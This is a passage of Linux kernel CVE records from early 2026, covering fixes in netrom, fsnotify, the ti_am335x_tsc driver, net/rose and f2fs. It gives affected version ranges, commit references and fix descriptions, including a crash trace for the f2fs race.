"url": "https://git.kernel.org/stable/c/09efbf54eeaecebe882af603c9939a4b1bb9567e"
},
{
"url": "https://git.kernel.org/stable/c/73839497bbde5cd4fd02bbd9c8bc2640780ae65d"
},
{
"url": "https://git.kernel.org/stable/c/156a0f6341dce634a825db49ca20b48b1ae9bcc1"
},
{
"url": "https://git.kernel.org/stable/c/8d1ccba4b171cd504ecfa47349cb9864fc9d687c"
},
{
"url": "https://git.kernel.org/stable/c/51f5fbc1681bdcffcc7d18bf3dfdb2b1278d3977"
},
{
"url": "https://git.kernel.org/stable/c/613d12dd794e078be8ff3cf6b62a6b9acf7f4619"
}
],
"title": "netrom: Fix memory leak in nr_sendmsg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68787",
"datePublished": "2026-01-13T15:29:00.344Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:03.559Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68788 (GCVE-0-2025-68788)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
fsnotify: do not generate ACCESS/MODIFY events on child for special files
Summary
In the Linux kernel, the following vulnerability has been resolved:
fsnotify: do not generate ACCESS/MODIFY events on child for special files
inotify/fanotify do not allow users with no read access to a file to
subscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the
same user to subscribe for watching events on children when the user
has access to the parent directory (e.g. /dev).
Users with no read access to a file but with read access to its parent
directory can still stat the file and see if it was accessed/modified
via atime/mtime change.
The same is not true for special files (e.g. /dev/null). Users will not
generally observe atime/mtime changes when other users read/write to
special files, only when someone sets atime/mtime via utimensat().
Align fsnotify events with this stat behavior and do not generate
ACCESS/MODIFY events to parent watchers on read/write of special files.
The events are still generated to parent watchers on utimensat(). This
closes some side-channels that could be possibly used for information
exfiltration [1].
[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
72acc854427948efed7a83da27f7dc3239ac9afc , < df2711544b050aba703e6da418c53c7dc5d443ca
(git)
Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 859bdf438f01d9aa7f84b09c1202d548c7cad9e8 (git) Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91 (git) Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < e0643d46759db8b84c0504a676043e5e341b6c81 (git) Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 82f7416bcbd951549e758d15fc1a96a5afc2e900 (git) Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6 (git) Affected: 72acc854427948efed7a83da27f7dc3239ac9afc , < 635bc4def026a24e071436f4f356ea08c0eed6ff (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/notify/fsnotify.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "df2711544b050aba703e6da418c53c7dc5d443ca",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "859bdf438f01d9aa7f84b09c1202d548c7cad9e8",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "e0643d46759db8b84c0504a676043e5e341b6c81",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "82f7416bcbd951549e758d15fc1a96a5afc2e900",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
},
{
"lessThan": "635bc4def026a24e071436f4f356ea08c0eed6ff",
"status": "affected",
"version": "72acc854427948efed7a83da27f7dc3239ac9afc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/notify/fsnotify.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.36"
},
{
"lessThan": "2.6.36",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.36",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:04.736Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/df2711544b050aba703e6da418c53c7dc5d443ca"
},
{
"url": "https://git.kernel.org/stable/c/859bdf438f01d9aa7f84b09c1202d548c7cad9e8"
},
{
"url": "https://git.kernel.org/stable/c/6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91"
},
{
"url": "https://git.kernel.org/stable/c/e0643d46759db8b84c0504a676043e5e341b6c81"
},
{
"url": "https://git.kernel.org/stable/c/82f7416bcbd951549e758d15fc1a96a5afc2e900"
},
{
"url": "https://git.kernel.org/stable/c/7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6"
},
{
"url": "https://git.kernel.org/stable/c/635bc4def026a24e071436f4f356ea08c0eed6ff"
}
],
"title": "fsnotify: do not generate ACCESS/MODIFY events on child for special files",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68788",
"datePublished": "2026-01-13T15:29:01.270Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-19T12:19:04.736Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68777 (GCVE-0-2025-68777)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
Input: ti_am335x_tsc - fix off-by-one error in wire_order validation
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: ti_am335x_tsc - fix off-by-one error in wire_order validation
The current validation 'wire_order[i] > ARRAY_SIZE(config_pins)' allows
wire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds
access when used as index in 'config_pins[wire_order[i]]'.
Since config_pins has 4 elements (indices 0-3), the valid range for
wire_order should be 0-3. Fix the off-by-one error by using >= instead
of > in the validation check.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < a7ff2360431561b56f559d3a628d1f096048d178
(git)
Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < 136abe173a3cc2951d70c6e51fe7abdbadbb204b (git) Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < 08c0b561823a7026364efb38ed7f4a3af48ccfcd (git) Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < bf95ec55805828c4f2b5241fb6b0c12388548570 (git) Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < 84e4d3543168912549271b34261f5e0f94952d6e (git) Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < 40e3042de43ffa0017a8460ff9b4cad7b8c7cb96 (git) Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439 , < 248d3a73a0167dce15ba100477c3e778c4787178 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/touchscreen/ti_am335x_tsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a7ff2360431561b56f559d3a628d1f096048d178",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "136abe173a3cc2951d70c6e51fe7abdbadbb204b",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "08c0b561823a7026364efb38ed7f4a3af48ccfcd",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "bf95ec55805828c4f2b5241fb6b0c12388548570",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "84e4d3543168912549271b34261f5e0f94952d6e",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "40e3042de43ffa0017a8460ff9b4cad7b8c7cb96",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "248d3a73a0167dce15ba100477c3e778c4787178",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/touchscreen/ti_am335x_tsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.11"
},
{
"lessThan": "3.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "3.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:57.283Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a7ff2360431561b56f559d3a628d1f096048d178"
},
{
"url": "https://git.kernel.org/stable/c/136abe173a3cc2951d70c6e51fe7abdbadbb204b"
},
{
"url": "https://git.kernel.org/stable/c/08c0b561823a7026364efb38ed7f4a3af48ccfcd"
},
{
"url": "https://git.kernel.org/stable/c/bf95ec55805828c4f2b5241fb6b0c12388548570"
},
{
"url": "https://git.kernel.org/stable/c/84e4d3543168912549271b34261f5e0f94952d6e"
},
{
"url": "https://git.kernel.org/stable/c/40e3042de43ffa0017a8460ff9b4cad7b8c7cb96"
},
{
"url": "https://git.kernel.org/stable/c/248d3a73a0167dce15ba100477c3e778c4787178"
}
],
"title": "Input: ti_am335x_tsc - fix off-by-one error in wire_order validation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68777",
"datePublished": "2026-01-13T15:28:53.416Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:57.283Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71086 (GCVE-0-2025-71086)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net: rose: fix invalid array index in rose_kill_by_device()
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: rose: fix invalid array index in rose_kill_by_device()
rose_kill_by_device() collects sockets into a local array[] and then
iterates over them to disconnect sockets bound to a device being brought
down.
The loop mistakenly indexes array[cnt] instead of array[i]. For cnt <
ARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==
ARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to
an invalid socket pointer dereference and also leaks references taken
via sock_hold().
Fix the index to use i.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
12e5a4719c99d7f4104e7e962393dfb8baa1c591 , < 819fb41ae54960f66025802400c9d3935eef4042
(git)
Affected: c0e527c532a07556ca44642f5873b002c44da22c , < ed2639414d43ba037f798eaf619e878309310451 (git) Affected: 3e0d1585799d8a991eba9678f297fd78d9f1846e , < 1418c12cd3bba79dc56b57b61c99efe40f579981 (git) Affected: ffced26692f83212aa09d0ece0213b23cc2f611d , < 9f6185a32496834d6980b168cffcccc2d6b17280 (git) Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be , < b409ba9e1e63ccf3ab4cc061e33c1f804183543e (git) Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be , < 92d900aac3a5721fb54f3328f1e089b44a861c38 (git) Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be , < 6595beb40fb0ec47223d3f6058ee40354694c8e4 (git) Affected: bd7de4734535140fda33240c2335a07fdab6f88e (git) Affected: b10265532df7bc3666bc53261b7f03f0fd14b1c9 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rose/af_rose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "819fb41ae54960f66025802400c9d3935eef4042",
"status": "affected",
"version": "12e5a4719c99d7f4104e7e962393dfb8baa1c591",
"versionType": "git"
},
{
"lessThan": "ed2639414d43ba037f798eaf619e878309310451",
"status": "affected",
"version": "c0e527c532a07556ca44642f5873b002c44da22c",
"versionType": "git"
},
{
"lessThan": "1418c12cd3bba79dc56b57b61c99efe40f579981",
"status": "affected",
"version": "3e0d1585799d8a991eba9678f297fd78d9f1846e",
"versionType": "git"
},
{
"lessThan": "9f6185a32496834d6980b168cffcccc2d6b17280",
"status": "affected",
"version": "ffced26692f83212aa09d0ece0213b23cc2f611d",
"versionType": "git"
},
{
"lessThan": "b409ba9e1e63ccf3ab4cc061e33c1f804183543e",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"lessThan": "92d900aac3a5721fb54f3328f1e089b44a861c38",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"lessThan": "6595beb40fb0ec47223d3f6058ee40354694c8e4",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"status": "affected",
"version": "bd7de4734535140fda33240c2335a07fdab6f88e",
"versionType": "git"
},
{
"status": "affected",
"version": "b10265532df7bc3666bc53261b7f03f0fd14b1c9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rose/af_rose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.206",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.146",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.304",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.266",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:49.873Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/819fb41ae54960f66025802400c9d3935eef4042"
},
{
"url": "https://git.kernel.org/stable/c/ed2639414d43ba037f798eaf619e878309310451"
},
{
"url": "https://git.kernel.org/stable/c/1418c12cd3bba79dc56b57b61c99efe40f579981"
},
{
"url": "https://git.kernel.org/stable/c/9f6185a32496834d6980b168cffcccc2d6b17280"
},
{
"url": "https://git.kernel.org/stable/c/b409ba9e1e63ccf3ab4cc061e33c1f804183543e"
},
{
"url": "https://git.kernel.org/stable/c/92d900aac3a5721fb54f3328f1e089b44a861c38"
},
{
"url": "https://git.kernel.org/stable/c/6595beb40fb0ec47223d3f6058ee40354694c8e4"
}
],
"title": "net: rose: fix invalid array index in rose_kill_by_device()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71086",
"datePublished": "2026-01-13T15:34:49.007Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:49.873Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68772 (GCVE-0-2025-68772)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
f2fs: fix to avoid updating compression context during writeback
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid updating compression context during writeback
Bai, Shuangpeng <sjb7183@psu.edu> reported a bug as below:
Oops: divide error: 0000 [#1] SMP KASAN PTI
CPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857
Call Trace:
<TASK>
f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline]
__f2fs_write_data_pages fs/f2fs/data.c:3290 [inline]
f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317
do_writepages+0x38e/0x640 mm/page-writeback.c:2634
filemap_fdatawrite_wbc mm/filemap.c:386 [inline]
__filemap_fdatawrite_range mm/filemap.c:419 [inline]
file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794
f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294
generic_write_sync include/linux/fs.h:3043 [inline]
f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x7e9/0xe00 fs/read_write.c:686
ksys_write+0x19d/0x2d0 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
The bug was triggered w/ below race condition:
fsync setattr ioctl
- f2fs_do_sync_file
- file_write_and_wait_range
- f2fs_write_cache_pages
: inode is non-compressed
: cc.cluster_size =
F2FS_I(inode)->i_cluster_size = 0
- tag_pages_for_writeback
- f2fs_setattr
- truncate_setsize
- f2fs_truncate
- f2fs_fileattr_set
- f2fs_setflags_common
- set_compress_context
: F2FS_I(inode)->i_cluster_size = 4
: set_inode_flag(inode, FI_COMPRESSED_FILE)
- f2fs_compressed_file
: return true
- f2fs_all_cluster_page_ready
: "pgidx % cc->cluster_size" trigger dividing 0 issue
Let's change as below to fix this issue:
- introduce a new atomic type variable .writeback in structure f2fs_inode_info
to track the number of threads which calling f2fs_write_cache_pages().
- use .i_sem lock to protect .writeback update.
- check .writeback before update compression context in f2fs_setflags_common()
to avoid race w/ ->writepages.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
4c8ff7095bef64fc47e996a938f7d57f9e077da3 , < ad26bfbc085c939b5dca77ff8c14798c06d151c4
(git)
Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3 , < bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0 (git) Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3 , < 0bf1a02494c7eb5bd43445de4c83c8592e02c4bf (git) Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3 , < 0df713a9c082a474c8b0bcf670edc8e98461d5a0 (git) Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3 , < 10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/data.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/file.c",
"fs/f2fs/super.c"
],
